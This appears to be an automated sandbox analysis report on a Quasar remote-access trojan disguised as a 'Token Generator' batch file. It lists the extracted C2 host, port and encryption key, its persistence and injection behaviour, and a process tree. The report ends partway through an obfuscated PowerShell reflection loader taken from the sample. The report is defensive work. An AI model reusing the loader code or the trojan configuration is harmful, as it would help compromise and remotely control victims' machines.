Analysis
-
max time kernel
54s -
max time network
52s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27-05-2024 22:13
Static task
static1
General
-
Target
Token Generator.bat
-
Size
3.5MB
-
MD5
e984ebea899379a8c0a47f9308c7370b
-
SHA1
863330006bef4c55a1bc79771ae989dc0412f717
-
SHA256
9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
-
SHA512
70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975
-
SSDEEP
49152:HgquNH3RLlp72pnTcrwIBX1F2A5LzeuUxZ3u3AnCH4El0oKYlL:HY
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
1.4.1
Token Gen
uk2.localto.net:6103
0c14e9f2-6918-4e50-8463-04ad871c1e3d
-
encryption_key
6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
-
install_name
$77-powershell.exe
-
log_directory
$77-Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77-Rootkit
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/4732-14-0x00000222E0D90000-0x00000222E122E000-memory.dmp family_quasar behavioral1/memory/540-54-0x0000020FF9660000-0x0000020FF9984000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\Token Generator.exe family_quasar behavioral1/memory/948-72-0x0000000000BA0000-0x0000000000EC4000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 5028 created 616 5028 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4732 powershell.exe 3548 powershell.exe 540 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeToken Generator.exe$77-powershell.exe$77-powershell.exepid process 2696 Install.exe 948 Token Generator.exe 1540 $77-powershell.exe 1720 $77-powershell.exe -
Drops file in System32 directory 9 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Discord svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 5028 set thread context of 2008 5028 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3500 schtasks.exe 3492 schtasks.exe 4496 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
mousocoreworker.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 55 IoCs
Processes:
powershell.EXEsvchost.exemousocoreworker.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000b460ddc91a56754c908534f98c11faec00000000020000000000106600000001000020000000134c42e2d98661acc1ad224822666c6e2499ec14a0bfeadf38397a3709ad9fba000000000e8000000002000020000000c68d1b0f0b1a7ba82a15e2c03c6349b7836ae406ead13f21a8c8f2a46486e6a1b0030000861bca32a9b754562fbf0e67082795e8e30b03c2292d0db8f4c0336f3bc5f06ba10809c2525dfd52a44a098c8b384cd754683fd70f428c53cf41b0f514917a4ff3e0735636ae6988b4a7a7bc1af7f9deacd9b82069cb20e49a383f6e0b1909e8d759a7b1205c46371d30285d3a83542c08a3239846b30716d80ac486e37021f80bfd3fd523ad75ede32684bb8635737553684c8519f590c3a63da05e2687986eddae1a21688e09487c559c7ad69519a546ba47016e46478ea78fb190b9377c4ee78378e6130d4939c5e13976105acf6e85540c678f5922061897f310593db038979c48701b83ecec88cefb600080ba7cd9b257b8cdaf1375c0508bd36310fa854daf3ded8929528360fa4b64d6b18a27f5848b9c3fa8a50d573121638f477ad77b952d1a081f8402f67b2bb9f8bbd15c33637a2da9b897fac8875eb2cc7cac8acc224b427c6baf806551e6d9991ec707037a625bf40249e64811098406eb205fc09c823ae38635503bb08d270b6e4ab8788ba458caed2f22dbb3d304ba1e850665da7d37927bec105d55827074bd7eef71d8c4e9845e59f96ae3dca9fe80a057ea9548ff6a826481498cb5bd41389531d786854bbc573b8caa354cbe2f7b01c97bbbb5b3431eea3f1f0b485df30476e2b639970e0cc358a7f18428ff8f39a8b361d697a7a60c5cafaa40eeaf60209f67a37dfdc3032fb030a5daa75290d6f8ff900be7561825bca0b256deb2f39ef0eea570b4498f42440fed81f4b2c74aae493101c3ba79614285c8f360d8bb770cc61b8e988d13a5de05e88187b47c546134aa73df592f97a5391394ddc5b32d62936f1ddee6ca40c82e69c8e825e7a4810fcc73d4bcc300dc9c2b67a1a836ef311755022a34bf379b0498b58d8dcf0bd21b1c7c715df13f47dc0cc83a908f6d64175a306a2d13784c6fd694fd54ddf346e23d29e8f88eb2d8ce97dca25a39fff65c189709fa1adf6710079c019af0730ed1aaed338491bbe8b8f3e12f11b5b528f25315b56b65b3f80d3d274ed3db4cdadc5b3b5d6bf9a6ef2d9ead3e211dbc23087f20ea514725602b967dd87c8a386793f90f07e00e6dda99a0453cf0e6b2d5fff00b418afcaedbff91dd3eac71284c6252c30cdbb363b8bf718e21ee86b413f98221968566e5d54f94f4f91d701099f68c24f1755cf33fef35faa4d0cbde86930d3f1cedfe8d45f5718d1b3ae65ef365e5797307cfd30f5d902fd98000f6822dacb581e729c2c543fcd89589067770b8e57dd25416fb67df77649f406d7b217f10b63b6d48e7e14b66018d6bacc5d63986a38d8fb98d9d67157f66590b5a91c0400000000d434ace62c528ed1310d1beb6016f2c3c8f92f1cb888e53043113de2949437f78f8dbee6d9aadffea065aa81411b2f5b5059556cf2c2dced950506d8880b959 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C00DBE62A04D = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000b460ddc91a56754c908534f98c11faec000000000200000000001066000000010000200000008f16d8eb5e01de01159f4c347291f67101786d4d58b5d58f0ee3b1f58812ca6a000000000e8000000002000020000000631ad72ffb7eb970a22b3798087007347e5a01aac5c3262df1e51356c5611ae880000000bc80fd9631a5d472e8b5d4b8c0ba9daa0fffcfb675ae3579ccd1fde2d6c6da4cc7d69544a8460a7485069f017a851563c4b5056ad4fa33e29310bf3b6cceb19cf842671ce7b92cdcaecef9d503f224d19b9269cbe1deb3ea15cee97f12db139f28e49693c7be2af3f404655757b9fe594c898d181ba599c971280c2ab11bd0ad400000001a9b711706fb9c171b19be9cc8da03630f28da7cd39696050efc431ed010944746779ba29c0487917ec03fe037ef711e4c0dfb5d8ac422b5946a898a77a1c17c mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C00DBE62A04D" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeToken Generator.exepowershell.EXEdllhost.exepid process 4732 powershell.exe 4732 powershell.exe 3548 powershell.exe 3548 powershell.exe 540 powershell.exe 540 powershell.exe 948 Token Generator.exe 948 Token Generator.exe 5028 powershell.EXE 5028 powershell.EXE 5028 powershell.EXE 5028 powershell.EXE 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe 2008 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4732 powershell.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeIncreaseQuotaPrivilege 3548 powershell.exe Token: SeSecurityPrivilege 3548 powershell.exe Token: SeTakeOwnershipPrivilege 3548 powershell.exe Token: SeLoadDriverPrivilege 3548 powershell.exe Token: SeSystemProfilePrivilege 3548 powershell.exe Token: SeSystemtimePrivilege 3548 powershell.exe Token: SeProfSingleProcessPrivilege 3548 powershell.exe Token: SeIncBasePriorityPrivilege 3548 powershell.exe Token: SeCreatePagefilePrivilege 3548 powershell.exe Token: SeBackupPrivilege 3548 powershell.exe Token: SeRestorePrivilege 3548 powershell.exe Token: SeShutdownPrivilege 3548 powershell.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeSystemEnvironmentPrivilege 3548 powershell.exe Token: SeRemoteShutdownPrivilege 3548 powershell.exe Token: SeUndockPrivilege 3548 powershell.exe Token: SeManageVolumePrivilege 3548 powershell.exe Token: 33 3548 powershell.exe Token: 34 3548 powershell.exe Token: 35 3548 powershell.exe Token: 36 3548 powershell.exe Token: SeIncreaseQuotaPrivilege 3548 powershell.exe Token: SeSecurityPrivilege 3548 powershell.exe Token: SeTakeOwnershipPrivilege 3548 powershell.exe Token: SeLoadDriverPrivilege 3548 powershell.exe Token: SeSystemProfilePrivilege 3548 powershell.exe Token: SeSystemtimePrivilege 3548 powershell.exe Token: SeProfSingleProcessPrivilege 3548 powershell.exe Token: SeIncBasePriorityPrivilege 3548 powershell.exe Token: SeCreatePagefilePrivilege 3548 powershell.exe Token: SeBackupPrivilege 3548 powershell.exe Token: SeRestorePrivilege 3548 powershell.exe Token: SeShutdownPrivilege 3548 powershell.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeSystemEnvironmentPrivilege 3548 powershell.exe Token: SeRemoteShutdownPrivilege 3548 powershell.exe Token: SeUndockPrivilege 3548 powershell.exe Token: SeManageVolumePrivilege 3548 powershell.exe Token: 33 3548 powershell.exe Token: 34 3548 powershell.exe Token: 35 3548 powershell.exe Token: 36 3548 powershell.exe Token: SeIncreaseQuotaPrivilege 3548 powershell.exe Token: SeSecurityPrivilege 3548 powershell.exe Token: SeTakeOwnershipPrivilege 3548 powershell.exe Token: SeLoadDriverPrivilege 3548 powershell.exe Token: SeSystemProfilePrivilege 3548 powershell.exe Token: SeSystemtimePrivilege 3548 powershell.exe Token: SeProfSingleProcessPrivilege 3548 powershell.exe Token: SeIncBasePriorityPrivilege 3548 powershell.exe Token: SeCreatePagefilePrivilege 3548 powershell.exe Token: SeBackupPrivilege 3548 powershell.exe Token: SeRestorePrivilege 3548 powershell.exe Token: SeShutdownPrivilege 3548 powershell.exe Token: SeDebugPrivilege 3548 powershell.exe Token: SeSystemEnvironmentPrivilege 3548 powershell.exe Token: SeRemoteShutdownPrivilege 3548 powershell.exe Token: SeUndockPrivilege 3548 powershell.exe Token: SeManageVolumePrivilege 3548 powershell.exe Token: 33 3548 powershell.exe Token: 34 3548 powershell.exe Token: 35 3548 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$77-powershell.exepid process 1720 $77-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 1912 wrote to memory of 4732 1912 cmd.exe powershell.exe PID 1912 wrote to memory of 4732 1912 cmd.exe powershell.exe PID 4732 wrote to memory of 3548 4732 powershell.exe powershell.exe PID 4732 wrote to memory of 3548 4732 powershell.exe powershell.exe PID 4732 wrote to memory of 4764 4732 powershell.exe WScript.exe PID 4732 wrote to memory of 4764 4732 powershell.exe WScript.exe PID 4764 wrote to memory of 4676 4764 WScript.exe cmd.exe PID 4764 wrote to memory of 4676 4764 WScript.exe cmd.exe PID 4676 wrote to memory of 540 4676 cmd.exe powershell.exe PID 4676 wrote to memory of 540 4676 cmd.exe powershell.exe PID 540 wrote to memory of 2696 540 powershell.exe Install.exe PID 540 wrote to memory of 2696 540 powershell.exe Install.exe PID 540 wrote to memory of 2696 540 powershell.exe Install.exe PID 540 wrote to memory of 948 540 powershell.exe Token Generator.exe PID 540 wrote to memory of 948 540 powershell.exe Token Generator.exe PID 540 wrote to memory of 3500 540 powershell.exe schtasks.exe PID 540 wrote to memory of 3500 540 powershell.exe schtasks.exe PID 540 wrote to memory of 1540 540 powershell.exe $77-powershell.exe PID 540 wrote to memory of 1540 540 powershell.exe $77-powershell.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 5028 wrote to memory of 2008 5028 powershell.EXE dllhost.exe PID 2008 wrote to memory of 616 2008 dllhost.exe winlogon.exe PID 2008 wrote to memory of 668 2008 dllhost.exe lsass.exe PID 2008 wrote to memory of 972 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 388 2008 dllhost.exe dwm.exe PID 2008 wrote to memory of 428 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 912 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1136 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1152 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1160 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1220 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1244 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1300 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1376 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1416 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1456 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1548 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1556 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1664 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1696 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1768 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1776 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1944 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1972 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 1992 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2016 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2080 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2108 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2196 2008 dllhost.exe spoolsv.exe PID 2008 wrote to memory of 2292 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2416 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2544 2008 dllhost.exe sihost.exe PID 2008 wrote to memory of 2568 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2576 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2584 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2756 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2792 2008 dllhost.exe svchost.exe PID 2008 wrote to memory of 2816 2008 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:388
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c76ce5b4-da58-4a58-a3ee-8309914ab7eb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2008
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1136
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1152
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1160 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uDPOMOmhFbkf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZpKxQdnsakmbfe,[Parameter(Position=1)][Type]$ceGvpkcnMT)$iTqVzevTcML=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+'ec'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+'t'+'e'+''+'T'+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'ass,'+[Char](80)+''+'u'+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$iTqVzevTcML.DefineConstructor(''+[Char](82)+'TS'+'p'+'e'+[Char](99)+''+'i'+''+'a'+''+'l'+''+[Char](78)+''+'a'+''+'m'+'e,'+'H'+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZpKxQdnsakmbfe).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+'m'+''+'e'+''+','+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$iTqVzevTcML.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eB'+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+'V'+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+'l',$ceGvpkcnMT,$ZpKxQdnsakmbfe).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'na'+[Char](103)+''+'e'+'d');Write-Output 